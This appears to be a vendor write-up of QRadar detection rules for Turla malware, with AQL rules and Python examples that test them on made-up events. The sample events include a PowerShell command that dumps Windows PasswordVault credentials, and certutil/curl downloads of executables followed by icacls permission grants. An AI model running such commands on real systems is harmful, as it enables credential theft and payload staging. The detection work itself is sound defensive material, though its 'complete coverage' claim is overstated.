Introduction
Turla is a Russian threat group widely known for its attacks. It has been active since 2004 and has claimed victims in 45 countries. Turla is also the name used for the group's tooling: a multitude of different malware families fall under the Turla umbrella. Familiar names include Epic, TinyTurla, Empire, and more.
The Security Content team investigated Turla attacks based on MITRE ATT&CK techniques. The content extension includes both generic technique detection rules and Turla-specific rules. The difference is visible in the rule names: a generic rule is named along the lines of "Suspicious XYZ Behaviour", while a Turla-specific rule is named, for example, "Potential Epic Activity".
Both kinds of rule are included because a Turla intrusion chains several techniques, and those same techniques are also used by other attackers. The generic rules catch the technique whoever uses it, while the Turla-specific rules catch the group's known artefacts, so together they provide complete coverage.
Turla's Carbon malware starts with an Initial Access technique: a spearphishing email or a compromised website is used to install a backdoor. Exfiltration follows, where sensitive information is leaked to the attackers, and Lateral Movement is used to move across the network to other computers.
From this we observe that the malware behaviours typically start with Initial Access, followed by other tactics such as Exfiltration, Collection, Command and Control, and so on.
A total of 374 custom rules are contained in the content extension.
General Techniques
Activities are detected based on MITRE ATT&CK techniques. Some techniques are common to multiple threats; for these we created rules that work independently of Turla and cover the technique across threats.
Let’s take a look at an example in more detail.
Dump Credentials from Windows Credential Manager with PowerShell
Apply Dump Credentials from Windows Credential Manager With PowerShell on events which are detected by the Local system and when the event(s) were detected by one or more of Microsoft Windows Security Event Log and when the event category for the event is one of the following Audit.Command Execution Success, Exploit.Command Execution and when the event matches (LOWER("Command") LIKE '%get-passwordvaultcredentials%' OR LOWER("Command") LIKE '%get-credmancreds%') OR (LOWER("Command") LIKE '%new-object%' AND LOWER("Command") LIKE '%windows.security.credentials.passwordvault%') OR (LOWER("Command") LIKE '%new-object%' AND LOWER("Command") LIKE '%microsoft.csharp.csharpcodeprovider%' AND LOWER("Command") LIKE '%runtime.interopservices.runtimeenvironment]::getruntimedirectory(%' AND LOWER("Command") LIKE '%collections.arraylist%' AND LOWER("Command") LIKE '%codedom.compiler.compilerparameters%') AQL filter query
This rule detects adversaries searching common password storage locations to obtain user credentials. Any command that refers to a Windows credential store (e.g. the password vault) is monitored. The three OR-ed clauses cover the well-known dumping functions, direct use of the PasswordVault class, and in-memory C# compilation of a vault reader; within the last clause every token must be present, which keeps ordinary CodeDom usage from firing the rule.
If a technique is generic enough to raise concerns about false positives, the rule is implemented as a building block instead and only fires in combination with other malicious behaviours that follow it.
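To make the three clauses of the rule concrete, here is an added Python example (written for this page, not code from the content extension, which runs inside QRadar) that applies the same log-source, category and command-line tests to a handful of constructed events. AQL's `LOWER("Command") LIKE '%x%'` is translated to a case-folded substring check. The event field names and the sample command lines are assumptions of this example.

```python
"""Stand-alone re-implementation of the credential-manager rule (added example)."""

# Log source and event categories the rule is scoped to.
LOG_SOURCE = "Microsoft Windows Security Event Log"
CATEGORIES = {"Audit.Command Execution Success", "Exploit.Command Execution"}

# Clause 1: well-known credential-manager dumping functions (OR).
VAULT_FUNCTIONS = ("get-passwordvaultcredentials", "get-credmancreds")
# Clause 2: direct use of the WinRT PasswordVault class together with New-Object.
PASSWORD_VAULT_CLASS = "windows.security.credentials.passwordvault"
# Clause 3: in-memory C# compilation; every token must be present (AND).
CSHARP_COMPILE_TOKENS = (
    "new-object",
    "microsoft.csharp.csharpcodeprovider",
    "runtime.interopservices.runtimeenvironment]::getruntimedirectory(",
    "collections.arraylist",
    "codedom.compiler.compilerparameters",
)


def command_matches(command: str) -> bool:
    """Equivalent of the rule's LOWER("Command") LIKE '%...%' expression."""
    c = command.lower()  # LOWER(): the comparison is case-insensitive
    if any(fn in c for fn in VAULT_FUNCTIONS):
        return True
    if "new-object" in c and PASSWORD_VAULT_CLASS in c:
        return True
    return all(tok in c for tok in CSHARP_COMPILE_TOKENS)


def evaluate(events):
    """Return the ids of the events on which the rule would fire."""
    hits = []
    for ev in events:
        if ev["log_source"] != LOG_SOURCE or ev["category"] not in CATEGORIES:
            continue  # outside the rule's scope: the command is never tested
        if command_matches(ev["command"]):
            hits.append(ev["id"])
    return hits


# Constructed sample events (field names are an assumption of this example).
SAMPLE_EVENTS = [
    {"id": 1, "log_source": LOG_SOURCE, "category": "Audit.Command Execution Success",
     "command": "powershell.exe -nop -c \"$v = New-Object Windows.Security.Credentials.PasswordVault; "
                "$v.RetrieveAll() | % { $_.RetrievePassword(); $_ }\""},
    {"id": 2, "log_source": LOG_SOURCE, "category": "Exploit.Command Execution",
     "command": "Get-PasswordVaultCredentials -Force"},
    {"id": 3, "log_source": LOG_SOURCE, "category": "Audit.Command Execution Success",
     "command": "Get-Service -Name w32time"},  # benign administration
    {"id": 4, "log_source": LOG_SOURCE, "category": "Audit.Command Execution Success",
     # only some of clause 3's tokens: not a hit, because they are AND-ed
     "command": "$cp = New-Object Microsoft.CSharp.CSharpCodeProvider; "
                "$p = New-Object System.CodeDom.Compiler.CompilerParameters"},
    {"id": 5, "log_source": LOG_SOURCE, "category": "Audit.Command Execution Success",
     "command": "$cp = New-Object Microsoft.CSharp.CSharpCodeProvider; "
                "$refs = New-Object Collections.ArrayList; "
                "$refs.Add([System.Runtime.InteropServices.RuntimeEnvironment]::GetRuntimeDirectory() + 'System.dll'); "
                "$p = New-Object System.CodeDom.Compiler.CompilerParameters"},
    {"id": 6, "log_source": "Sysmon", "category": "Audit.Command Execution Success",
     "command": "Get-CredManCreds"},  # matches the pattern but is outside the rule's log-source scope
]

if __name__ == "__main__":
    print(evaluate(SAMPLE_EVENTS))  # [1, 2, 5]
```

Event 6 is the useful negative case: the command line is a textbook hit, but the rule is scoped to the Windows Security Event Log, so a PowerShell command that only reaches QRadar from another log source is not evaluated at all. That scoping is part of the rule and worth keeping in mind when judging coverage.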
File and Directory Permission Modification after Download
Apply File and Directory Permission Modification after Download on events which are detected by the Local system and when an event matches any of the following BB:DeviceDefinition: Endpoint Devices, BB:DeviceDefinition: Operating System and when BB:CategoryDefinition: File Permission Changed match at least 1 times with the same Machine Identifier (custom) in 1 hour(s) after BB:BehaviorDefinition: Download Utilities in Events, BB:BehaviorDefinition: PowerShell File Download Activity, BB:CategoryDefinition: Object Download Events match
This rule has several child building blocks:
- BB:CategoryDefinition: File Permission Changed
- BB:BehaviorDefinition: Download Utilities in Events
- BB:BehaviorDefinition: PowerShell File Download Activity
- BB:CategoryDefinition: Object Download Events
File downloads are not suspicious by nature, but a file permission change on the same machine within an hour of a download is. The order matters: a permission change that precedes the download, or one that happens more than an hour later, does not fire the rule.
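As an added illustration of how the building blocks and the one-hour window combine (example code written for this page, not the content extension's own implementation), the Python below labels constructed endpoint events with the building block they would satisfy and then correlates a File Permission Changed event with an earlier download on the same Machine Identifier. The command-line indicators used to assign building blocks, the event field names and the timestamps are assumptions of the example; the real building blocks are considerably richer.

```python
"""Stateful download-then-permission-change correlation (added example)."""
from datetime import datetime, timedelta

WINDOW = timedelta(hours=1)  # "in 1 hour(s) after" in the rule

DOWNLOAD_BBS = {
    "BB:BehaviorDefinition: Download Utilities in Events",
    "BB:BehaviorDefinition: PowerShell File Download Activity",
    "BB:CategoryDefinition: Object Download Events",
}
PERMISSION_BB = "BB:CategoryDefinition: File Permission Changed"

# Simplified stand-ins for the child building blocks: a few command-line
# indicators per block. This is an assumption of the example only.
BB_INDICATORS = {
    "BB:BehaviorDefinition: Download Utilities in Events":
        ("certutil -urlcache", "bitsadmin /transfer", "curl "),
    "BB:BehaviorDefinition: PowerShell File Download Activity":
        ("invoke-webrequest", "downloadfile(", "start-bitstransfer"),
    "BB:CategoryDefinition: File Permission Changed":
        ("icacls ", "cacls ", "takeown "),
}


def building_blocks(command):
    """Return the set of building blocks a command-line event satisfies."""
    c = command.lower()
    return {bb for bb, inds in BB_INDICATORS.items() if any(i in c for i in inds)}


def correlate(events):
    """Return (machine, time) for every permission change seen within WINDOW
    after a download building block matched on the same Machine Identifier."""
    last_download = {}  # machine -> time of its most recent download event
    offenses = []
    for ev in sorted(events, key=lambda e: e["time"]):  # process in time order
        bbs = building_blocks(ev["command"])
        if bbs & DOWNLOAD_BBS:
            last_download[ev["machine"]] = ev["time"]
        if PERMISSION_BB in bbs:
            t = last_download.get(ev["machine"])
            # The download must precede the change and be at most one hour old.
            if t is not None and t <= ev["time"] <= t + WINDOW:
                offenses.append((ev["machine"], ev["time"]))
    return offenses


def offending_machines(events):
    """Convenience wrapper returning only the Machine Identifiers that fired."""
    return [machine for machine, _ in correlate(events)]


# Constructed sample events (field names and values are assumptions).
T0 = datetime(2024, 5, 1, 9, 0, 0)
SAMPLE_EVENTS = [
    {"machine": "WS-01", "time": T0,
     "command": "certutil -urlcache -split -f http://198.51.100.7/u.exe C:\\Users\\Public\\u.exe"},
    {"machine": "WS-01", "time": T0 + timedelta(minutes=12),
     "command": "icacls C:\\Users\\Public\\u.exe /grant Everyone:F"},          # fires
    {"machine": "WS-02", "time": T0,
     "command": "powershell -c \"Invoke-WebRequest http://198.51.100.7/u.exe -OutFile C:\\Temp\\u.exe\""},
    {"machine": "WS-02", "time": T0 + timedelta(hours=2),
     "command": "icacls C:\\Temp\\u.exe /grant Everyone:F"},                  # too late
    {"machine": "WS-03", "time": T0 + timedelta(minutes=5),
     "command": "icacls C:\\Temp\\report.xlsx /inheritance:r"},               # no preceding download
    {"machine": "WS-03", "time": T0 + timedelta(minutes=30),
     "command": "curl http://203.0.113.9/tool.zip -o C:\\Temp\\tool.zip"},   # download after the change
]

if __name__ == "__main__":
    print(offending_machines(SAMPLE_EVENTS))  # ['WS-01']
```

Only WS-01 produces an offense: WS-02's permission change is outside the window, WS-03 changes permissions before it downloads anything, and nothing on WS-03 is correlated across machines because the state is keyed by Machine Identifier.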
Turla Malware Activity
Each rule covers a Turla malware activity. Each rule is composed of multiple building blocks, each discovering a specific activity related to the malware family.
- Potential Carbon Activity
- Potential ComRAT Activity
- Potential Crutch Activity
- Potential Empire Activity
- Potential Epic Activity
- Potential Gazer Activity
- Potential HyperStack Activity
- Potential Kazuar Activity
- Potential LOLBIN Activity
- Potential Mosquito Activity
- Potential TinyTurla Activity
Let’s take a look at a few rules in more detail.
Potential Epic Activity
Apply Potential Epic Activity on events which are detected by the Local system and when an event matches any of the following BB:BehaviorDefinition: Epic Filenames, BB:BehaviorDefinition: Epic Log Filenames, BB:BehaviorDefinition: Epic Search Terms
This rule has several child building blocks:
- BB:BehaviorDefinition: Epic Filenames
- BB:BehaviorDefinition: Epic Log Filenames
- BB:BehaviorDefinition: Epic Search Terms
Turla's Epic malware is delivered by spearphishing email and social engineering that gets the victim to run .SCR files, sometimes packaged in .RAR archives. It also exploits Java, Adobe, or Internet Explorer vulnerabilities to install fake applications that look legitimate, such as an Adobe installer.
In the command and control phase the malware executes reconnaissance commands, which are detected by the Potential Turla Recon Activity rule.
The building blocks monitor known malware file names and log file names, and keywords that appear in the malware's commands.
Potential TinyTurla Activity
Apply Potential TinyTurla Activity on events which are detected by the Local system and when the event(s) were detected by one or more of Microsoft Windows Security Event Log and when the event category for the event is one of the following Audit.Object Load Success, System.Successful Registry Modification and when the event matches LOWER("Filename") MATCHES ('w64time*') OR LOWER("Registry Value Data") MATCHES ('.*?w64time*') AQL filter query
TinyTurla installs a backdoor registered as a service called "Windows Time Service" to avoid detection. Its service DLL is named w64time.dll, a name chosen to blend in with Microsoft's legitimate w32time.dll. The rule detects occurrences of w64time both in loaded file names and in registry value data written when the service is registered. Note that MATCHES takes a regular expression, so in w64time* the * repeats the preceding e rather than acting as a wildcard; confirm with a test event that the rule fires on the full name w64time.dll and not only on the bare string w64time.
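The two MATCHES patterns are regular expressions, not file globs. The added Python example below (written for this page, not the content extension's own code) evaluates the rule's patterns against constructed events and shows why the pattern deserves a test: in a regex, `*` repeats the preceding `e`, so a whole-string match of `w64time*` accepts only `w64time` itself and rejects `w64time.dll`, while a substring search for `w64time` accepts both. The AQL reference describes MATCHES as comparing the expression against the entire string; treat that as the assumption to confirm on your own QRadar version with a test event. Event field names are assumptions of the example.

```python
"""Checking the TinyTurla regexes against sample events (added example)."""
import re

CATEGORIES = {"Audit.Object Load Success", "System.Successful Registry Modification"}

# The patterns exactly as they appear in the rule.
RULE_FILENAME = re.compile(r"w64time*")
RULE_REGDATA = re.compile(r".*?w64time*")
# What the write-up says the rule wants: any occurrence of "w64time".
INTENDED = re.compile(r"w64time")


def rule_as_written(filename, regdata, whole_string=True):
    """Apply the rule's own regexes. whole_string=True models a MATCHES
    operator that compares against the entire string (assumption: verify)."""
    fn, rd = filename.lower(), regdata.lower()  # LOWER(): case-insensitive
    if whole_string:
        return bool(RULE_FILENAME.fullmatch(fn) or RULE_REGDATA.fullmatch(rd))
    return bool(RULE_FILENAME.search(fn) or RULE_REGDATA.search(rd))


def intended(filename, regdata):
    """Substring test for w64time in either field."""
    return bool(INTENDED.search(filename.lower()) or INTENDED.search(regdata.lower()))


def evaluate(events, detector):
    """Return ids of in-scope events on which `detector` fires."""
    return [ev["id"] for ev in events
            if ev["category"] in CATEGORIES
            and detector(ev.get("filename", ""), ev.get("registry_value_data", ""))]


# Constructed sample events (field names are an assumption of this example).
SAMPLE_EVENTS = [
    {"id": 1, "category": "Audit.Object Load Success",
     "filename": "C:\\Windows\\System32\\w64time.dll", "registry_value_data": ""},
    {"id": 2, "category": "System.Successful Registry Modification",
     "filename": "", "registry_value_data": "%SystemRoot%\\System32\\W64Time.dll"},
    {"id": 3, "category": "Audit.Object Load Success",  # the legitimate time service
     "filename": "C:\\Windows\\System32\\w32time.dll", "registry_value_data": ""},
    {"id": 4, "category": "Audit.Object Load Success",  # bare name, no extension
     "filename": "w64time", "registry_value_data": ""},
]

if __name__ == "__main__":
    print(evaluate(SAMPLE_EVENTS, intended))                     # [1, 2, 4]
    print(evaluate(SAMPLE_EVENTS, rule_as_written))              # [4]
    print(evaluate(SAMPLE_EVENTS,
                   lambda f, r: rule_as_written(f, r, False)))   # [1, 2, 4]
```

If the test event with the full DLL path does not fire in your deployment, the fix is to drop the trailing `*` (or use `.*w64time.*`) so the pattern matches the name wherever it appears in the field; the legitimate w32time.dll is rejected either way.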
Conclusion
Cyber attacks are always evolving, and Turla is no exception. Our content extension covers both generic techniques and Turla-specific behaviour to provide a solid base of security coverage.
The content is mapped to its respective MITRE ATT&CK techniques in the Use Case Manager.